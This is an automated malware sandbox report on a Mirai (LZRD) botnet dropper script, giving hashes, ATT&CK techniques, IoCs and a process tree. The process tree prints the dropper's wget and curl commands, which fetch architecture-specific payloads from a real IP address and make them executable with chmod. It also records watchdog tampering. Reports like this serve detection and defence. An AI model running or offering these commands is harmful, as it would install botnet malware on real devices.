mirai | 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01

Analysis

max time kernel
149s
max time network
149s
platform
ubuntu-18.04_amd64
resource
ubuntu1804-amd64-20240729-en
resource tags

arch:amd64arch:i386image:ubuntu1804-amd64-20240729-enkernel:4.15.0-213-genericlocale:en-usos:ubuntu-18.04-amd64system
submitted
07/03/2025, 05:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
Size

2KB
MD5

92b0a18b935a6afdea317d573967bd1e
SHA1

09eeb86ddb300ff70f09613b2f50813488851c74
SHA256

97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01
SHA512

0abac2769286e7dcd3893ac64e604556418e134ddc6b5b38b9a7353fe3cb3048da3fa189416ec05c83147ca1f4c0a8dca2513f2fe7c93927097267884933dc14

Score

10^/10

mirai lzrd botnet defense_evasion discovery upx

Malware Config

Extracted

Family

mirai

Botnet

LZRD

Signatures

Mirai
Mirai is a prevalent Linux malware infecting exposed network devices.
botnet mirai
Mirai family
mirai

File and Directory Permissions Modification 1 TTPs 15 IoCs

Adversaries may modify file or directory permissions to evade defenses.

defense_evasion

Linux and Mac File and Directory Permissions Modification

T1222.002

pid	Process
1669	chmod
1549	chmod
1557	chmod
1641	chmod
1677	chmod
1581	chmod
1599	chmod
1573	chmod
1613	chmod
1625	chmod
1661	chmod
1533	chmod
1541	chmod
1565	chmod
1589	chmod

Executes dropped EXE 15 IoCs

ioc	pid	Process
/tmp/trf	1534	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
/tmp/trf	1542	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
/tmp/trf	1550	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
/tmp/trf	1558	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
/tmp/trf	1566	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
/tmp/trf	1574	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
/tmp/trf	1582	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
/tmp/trf	1590	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
/tmp/trf	1600	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
/tmp/trf	1614	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
/tmp/trf	1626	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
/tmp/trf	1642	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
/tmp/trf	1662	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
/tmp/trf	1670	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
/tmp/trf	1678	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh

Modifies Watchdog functionality 1 TTPs 2 IoCs

Malware like Mirai modifies the Watchdog to prevent it restarting an infected system.

defense_evasion

Impair Defenses

T1562

description	ioc	Process
File opened for modification	/dev/watchdog	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for modification	/dev/misc/watchdog	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh

Enumerates running processes
Discovers information about currently running processes on the system

Writes file to system bin folder 2 IoCs

description	ioc	Process
File opened for modification	/bin/watchdog	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for modification	/sbin/watchdog	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/fstream-1.dat	upx

Reads runtime system information 64 IoCs

Reads data from /proc virtual filesystem.

discovery

description	ioc	Process
File opened for reading	/proc/986/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1202/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1214/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1583/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1667/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1671/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/425/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/569/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/605/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1164/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1190/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1569/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1609/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1681/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/700/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1124/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1326/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1561/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1575/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1685/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/484/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/502/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/522/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1139/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1378/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1673/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1679/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/621/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1504/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1585/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/427/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1177/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1577/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/424/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1087/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1102/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1523/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1525/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1528/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1535/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1156/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1629/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1647/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/692/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/468/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/524/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1216/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1256/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1318/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/487/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1368/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1615/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1646/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1193/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1197/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/577/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1210/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1684/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1099/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1115/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1551/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/622/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1152/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for reading	/proc/1169/cmdline	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh

System Network Configuration Discovery 1 TTPs 2 IoCs

Adversaries may gather information about the network configuration of a system.

discovery

System Network Configuration Discovery

T1016

pid	Process
1538	wget
1539	curl

Writes file to tmp directory 28 IoCs

Malware often drops required files in the /tmp directory.

description	ioc	Process
File opened for modification	/tmp/trw.arm6	wget
File opened for modification	/tmp/trw.arm6	curl
File opened for modification	/tmp/trw.spc	curl
File opened for modification	/tmp/trw.x86	wget
File opened for modification	/tmp/trf	97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
File opened for modification	/tmp/trw.mips	wget
File opened for modification	/tmp/trw.mips	curl
File opened for modification	/tmp/trw.mpsl	curl
File opened for modification	/tmp/trw.arm5	curl
File opened for modification	/tmp/trw.arm7	wget
File opened for modification	/tmp/trw.ppc	wget
File opened for modification	/tmp/trw.x86_64	curl
File opened for modification	/tmp/trw.arm	wget
File opened for modification	/tmp/trw.ppc	curl
File opened for modification	/tmp/trw.spc	wget
File opened for modification	/tmp/trw.m68k	wget
File opened for modification	/tmp/trw.m68k	curl
File opened for modification	/tmp/trw.sh4	wget
File opened for modification	/tmp/trw.sh4	curl
File opened for modification	/tmp/trw.x86	curl
File opened for modification	/tmp/trw.arc	wget
File opened for modification	/tmp/trw.arm	curl
File opened for modification	/tmp/trw.arm5	wget
File opened for modification	/tmp/trw.arm7	curl
File opened for modification	/tmp/trw.arc	curl
File opened for modification	/tmp/trw.i468	curl
File opened for modification	/tmp/trw.i686	curl
File opened for modification	/tmp/trw.mpsl	wget

/tmp/97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
/tmp/97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh
1⤵
- Executes dropped EXE
- Modifies Watchdog functionality
- Writes file to system bin folder
- Reads runtime system information
- Writes file to tmp directory
PID:1525
- /usr/bin/wget
  wget http://23.146.184.61/hiddenbin/trw.x86
  2⤵
  - Writes file to tmp directory
  PID:1526
- /usr/bin/curl
  curl -O http://23.146.184.61/hiddenbin/trw.x86
  2⤵
  - Writes file to tmp directory
  PID:1531
- /bin/cat
  cat trw.x86
  2⤵
  PID:1532
- /bin/chmod
  chmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh config-err-ASBG0Z netplan_zus_ecme snap-private-tmp ssh-Gsfhk06Mg0aH systemd-private-d2ac9fea49a5420abb17bd4c01effd10-bolt.service-ENG7zw systemd-private-d2ac9fea49a5420abb17bd4c01effd10-colord.service-uuMDXB systemd-private-d2ac9fea49a5420abb17bd4c01effd10-ModemManager.service-qBW95W systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-resolved.service-yKNmlb systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-timedated.service-wi6RQ3 trf trw.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1533
- /usr/bin/wget
  wget http://23.146.184.61/hiddenbin/trw.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1538
- /usr/bin/curl
  curl -O http://23.146.184.61/hiddenbin/trw.mips
  2⤵
  - System Network Configuration Discovery
  - Writes file to tmp directory
  PID:1539
- /bin/chmod
  chmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh config-err-ASBG0Z netplan_zus_ecme snap-private-tmp ssh-Gsfhk06Mg0aH systemd-private-d2ac9fea49a5420abb17bd4c01effd10-bolt.service-ENG7zw systemd-private-d2ac9fea49a5420abb17bd4c01effd10-colord.service-uuMDXB systemd-private-d2ac9fea49a5420abb17bd4c01effd10-ModemManager.service-qBW95W systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-resolved.service-yKNmlb systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-timedated.service-wi6RQ3 trf trw.mips trw.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1541
- /usr/bin/wget
  wget http://23.146.184.61/hiddenbin/trw.arc
  2⤵
  - Writes file to tmp directory
  PID:1546
- /usr/bin/curl
  curl -O http://23.146.184.61/hiddenbin/trw.arc
  2⤵
  - Writes file to tmp directory
  PID:1547
- /bin/chmod
  chmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh config-err-ASBG0Z netplan_zus_ecme snap-private-tmp ssh-Gsfhk06Mg0aH systemd-private-d2ac9fea49a5420abb17bd4c01effd10-bolt.service-ENG7zw systemd-private-d2ac9fea49a5420abb17bd4c01effd10-colord.service-uuMDXB systemd-private-d2ac9fea49a5420abb17bd4c01effd10-ModemManager.service-qBW95W systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-resolved.service-yKNmlb systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-timedated.service-wi6RQ3 trf trw.arc trw.mips trw.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1549
- /usr/bin/wget
  wget http://23.146.184.61/hiddenbin/trw.i468
  2⤵
  PID:1554
- /usr/bin/curl
  curl -O http://23.146.184.61/hiddenbin/trw.i468
  2⤵
  - Writes file to tmp directory
  PID:1555
- /bin/chmod
  chmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh config-err-ASBG0Z netplan_zus_ecme snap-private-tmp ssh-Gsfhk06Mg0aH systemd-private-d2ac9fea49a5420abb17bd4c01effd10-bolt.service-ENG7zw systemd-private-d2ac9fea49a5420abb17bd4c01effd10-colord.service-uuMDXB systemd-private-d2ac9fea49a5420abb17bd4c01effd10-ModemManager.service-qBW95W systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-resolved.service-yKNmlb systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-timedated.service-wi6RQ3 trf trw.arc trw.i468 trw.mips trw.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1557
- /usr/bin/wget
  wget http://23.146.184.61/hiddenbin/trw.i686
  2⤵
  PID:1562
- /usr/bin/curl
  curl -O http://23.146.184.61/hiddenbin/trw.i686
  2⤵
  - Writes file to tmp directory
  PID:1563
- /bin/chmod
  chmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh config-err-ASBG0Z netplan_zus_ecme snap-private-tmp ssh-Gsfhk06Mg0aH systemd-private-d2ac9fea49a5420abb17bd4c01effd10-bolt.service-ENG7zw systemd-private-d2ac9fea49a5420abb17bd4c01effd10-colord.service-uuMDXB systemd-private-d2ac9fea49a5420abb17bd4c01effd10-ModemManager.service-qBW95W systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-resolved.service-yKNmlb systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-timedated.service-wi6RQ3 trf trw.arc trw.i468 trw.i686 trw.mips trw.x86
  2⤵
  - File and Directory Permissions Modification
  PID:1565
- /usr/bin/wget
  wget http://23.146.184.61/hiddenbin/trw.x86_64
  2⤵
  PID:1570
- /usr/bin/curl
  curl -O http://23.146.184.61/hiddenbin/trw.x86_64
  2⤵
  - Writes file to tmp directory
  PID:1571
- /bin/chmod
  chmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh config-err-ASBG0Z netplan_zus_ecme snap-private-tmp ssh-Gsfhk06Mg0aH systemd-private-d2ac9fea49a5420abb17bd4c01effd10-bolt.service-ENG7zw systemd-private-d2ac9fea49a5420abb17bd4c01effd10-colord.service-uuMDXB systemd-private-d2ac9fea49a5420abb17bd4c01effd10-ModemManager.service-qBW95W systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-resolved.service-yKNmlb systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-timedated.service-wi6RQ3 trf trw.arc trw.i468 trw.i686 trw.mips trw.x86 trw.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1573
- /usr/bin/wget
  wget http://23.146.184.61/hiddenbin/trw.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1578
- /usr/bin/curl
  curl -O http://23.146.184.61/hiddenbin/trw.mpsl
  2⤵
  - Writes file to tmp directory
  PID:1579
- /bin/chmod
  chmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh config-err-ASBG0Z netplan_zus_ecme snap-private-tmp ssh-Gsfhk06Mg0aH systemd-private-d2ac9fea49a5420abb17bd4c01effd10-bolt.service-ENG7zw systemd-private-d2ac9fea49a5420abb17bd4c01effd10-colord.service-uuMDXB systemd-private-d2ac9fea49a5420abb17bd4c01effd10-ModemManager.service-qBW95W systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-resolved.service-yKNmlb systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-timedated.service-wi6RQ3 trf trw.arc trw.i468 trw.i686 trw.mips trw.mpsl trw.x86 trw.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1581
- /usr/bin/wget
  wget http://23.146.184.61/hiddenbin/trw.arm
  2⤵
  - Writes file to tmp directory
  PID:1586
- /usr/bin/curl
  curl -O http://23.146.184.61/hiddenbin/trw.arm
  2⤵
  - Writes file to tmp directory
  PID:1587
- /bin/chmod
  chmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh config-err-ASBG0Z netplan_zus_ecme snap-private-tmp ssh-Gsfhk06Mg0aH systemd-private-d2ac9fea49a5420abb17bd4c01effd10-bolt.service-ENG7zw systemd-private-d2ac9fea49a5420abb17bd4c01effd10-colord.service-uuMDXB systemd-private-d2ac9fea49a5420abb17bd4c01effd10-ModemManager.service-qBW95W systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-resolved.service-yKNmlb systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-timedated.service-wi6RQ3 trf trw.arc trw.arm trw.i468 trw.i686 trw.mips trw.mpsl trw.x86 trw.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1589
- /usr/bin/wget
  wget http://23.146.184.61/hiddenbin/trw.arm5
  2⤵
  - Writes file to tmp directory
  PID:1594
- /usr/bin/curl
  curl -O http://23.146.184.61/hiddenbin/trw.arm5
  2⤵
  - Writes file to tmp directory
  PID:1595
- /bin/chmod
  chmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh config-err-ASBG0Z netplan_zus_ecme snap-private-tmp ssh-Gsfhk06Mg0aH systemd-private-d2ac9fea49a5420abb17bd4c01effd10-colord.service-uuMDXB systemd-private-d2ac9fea49a5420abb17bd4c01effd10-ModemManager.service-qBW95W systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-resolved.service-yKNmlb systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-timedated.service-wi6RQ3 trf trw.arc trw.arm trw.arm5 trw.i468 trw.i686 trw.mips trw.mpsl trw.x86 trw.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1599
- /usr/bin/wget
  wget http://23.146.184.61/hiddenbin/trw.arm6
  2⤵
  - Writes file to tmp directory
  PID:1604
- /usr/bin/curl
  curl -O http://23.146.184.61/hiddenbin/trw.arm6
  2⤵
  - Writes file to tmp directory
  PID:1609
- /bin/chmod
  chmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh config-err-ASBG0Z netplan_zus_ecme snap-private-tmp ssh-Gsfhk06Mg0aH systemd-private-d2ac9fea49a5420abb17bd4c01effd10-colord.service-uuMDXB systemd-private-d2ac9fea49a5420abb17bd4c01effd10-ModemManager.service-qBW95W systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-resolved.service-yKNmlb systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-timedated.service-wi6RQ3 trf trw.arc trw.arm trw.arm5 trw.arm6 trw.i468 trw.i686 trw.mips trw.mpsl trw.x86 trw.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1613
- /usr/bin/wget
  wget http://23.146.184.61/hiddenbin/trw.arm7
  2⤵
  - Writes file to tmp directory
  PID:1618
- /usr/bin/curl
  curl -O http://23.146.184.61/hiddenbin/trw.arm7
  2⤵
  - Writes file to tmp directory
  PID:1623
- /bin/chmod
  chmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh config-err-ASBG0Z netplan_zus_ecme snap-private-tmp ssh-Gsfhk06Mg0aH systemd-private-d2ac9fea49a5420abb17bd4c01effd10-bolt.service-Cg2jdB systemd-private-d2ac9fea49a5420abb17bd4c01effd10-colord.service-uuMDXB systemd-private-d2ac9fea49a5420abb17bd4c01effd10-ModemManager.service-qBW95W systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-resolved.service-yKNmlb systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-timedated.service-wi6RQ3 trf trw.arc trw.arm trw.arm5 trw.arm6 trw.arm7 trw.i468 trw.i686 trw.mips trw.mpsl trw.x86 trw.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1625
- /usr/bin/wget
  wget http://23.146.184.61/hiddenbin/trw.ppc
  2⤵
  - Writes file to tmp directory
  PID:1630
- /usr/bin/curl
  curl -O http://23.146.184.61/hiddenbin/trw.ppc
  2⤵
  - Writes file to tmp directory
  PID:1637
- /bin/chmod
  chmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh config-err-ASBG0Z netplan_zus_ecme snap-private-tmp ssh-Gsfhk06Mg0aH systemd-private-d2ac9fea49a5420abb17bd4c01effd10-colord.service-uuMDXB systemd-private-d2ac9fea49a5420abb17bd4c01effd10-ModemManager.service-qBW95W systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-resolved.service-yKNmlb systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-timedated.service-wi6RQ3 trf trw.arc trw.arm trw.arm5 trw.arm6 trw.arm7 trw.i468 trw.i686 trw.mips trw.mpsl trw.ppc trw.x86 trw.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1641
- /usr/bin/wget
  wget http://23.146.184.61/hiddenbin/trw.spc
  2⤵
  - Writes file to tmp directory
  PID:1646
- /usr/bin/curl
  curl -O http://23.146.184.61/hiddenbin/trw.spc
  2⤵
  - Writes file to tmp directory
  PID:1653
- /bin/chmod
  chmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh config-err-ASBG0Z netplan_zus_ecme snap-private-tmp ssh-Gsfhk06Mg0aH systemd-private-d2ac9fea49a5420abb17bd4c01effd10-colord.service-uuMDXB systemd-private-d2ac9fea49a5420abb17bd4c01effd10-ModemManager.service-qBW95W systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-resolved.service-yKNmlb systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-timedated.service-wi6RQ3 trf trw.arc trw.arm trw.arm5 trw.arm6 trw.arm7 trw.i468 trw.i686 trw.mips trw.mpsl trw.ppc trw.spc trw.x86 trw.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1661
- /usr/bin/wget
  wget http://23.146.184.61/hiddenbin/trw.m68k
  2⤵
  - Writes file to tmp directory
  PID:1666
- /usr/bin/curl
  curl -O http://23.146.184.61/hiddenbin/trw.m68k
  2⤵
  - Writes file to tmp directory
  PID:1667
- /bin/chmod
  chmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh config-err-ASBG0Z netplan_zus_ecme snap-private-tmp ssh-Gsfhk06Mg0aH systemd-private-d2ac9fea49a5420abb17bd4c01effd10-colord.service-uuMDXB systemd-private-d2ac9fea49a5420abb17bd4c01effd10-ModemManager.service-qBW95W systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-resolved.service-yKNmlb systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-timedated.service-wi6RQ3 trf trw.arc trw.arm trw.arm5 trw.arm6 trw.arm7 trw.i468 trw.i686 trw.m68k trw.mips trw.mpsl trw.ppc trw.spc trw.x86 trw.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1669
- /usr/bin/wget
  wget http://23.146.184.61/hiddenbin/trw.sh4
  2⤵
  - Writes file to tmp directory
  PID:1674
- /usr/bin/curl
  curl -O http://23.146.184.61/hiddenbin/trw.sh4
  2⤵
  - Writes file to tmp directory
  PID:1675
- /bin/chmod
  chmod +x 97494a11ca5c4b52978092cc55a411f7ee8790a358549c8c7523d2d27820ac01.sh config-err-ASBG0Z netplan_zus_ecme snap-private-tmp ssh-Gsfhk06Mg0aH systemd-private-d2ac9fea49a5420abb17bd4c01effd10-colord.service-uuMDXB systemd-private-d2ac9fea49a5420abb17bd4c01effd10-ModemManager.service-qBW95W systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-resolved.service-yKNmlb systemd-private-d2ac9fea49a5420abb17bd4c01effd10-systemd-timedated.service-wi6RQ3 trf trw.arc trw.arm trw.arm5 trw.arm6 trw.arm7 trw.i468 trw.i686 trw.m68k trw.mips trw.mpsl trw.ppc trw.sh4 trw.spc trw.x86 trw.x86_64
  2⤵
  - File and Directory Permissions Modification
  PID:1677

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

File and Directory Permissions Modification

T1222

Linux and Mac File and Directory Permissions Modification

T1222.002

Impair Defenses

T1562

Credential Access

Discovery

System Network Configuration Discovery

T1016

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

/tmp/trw.x86

Filesize
20KB

MD5
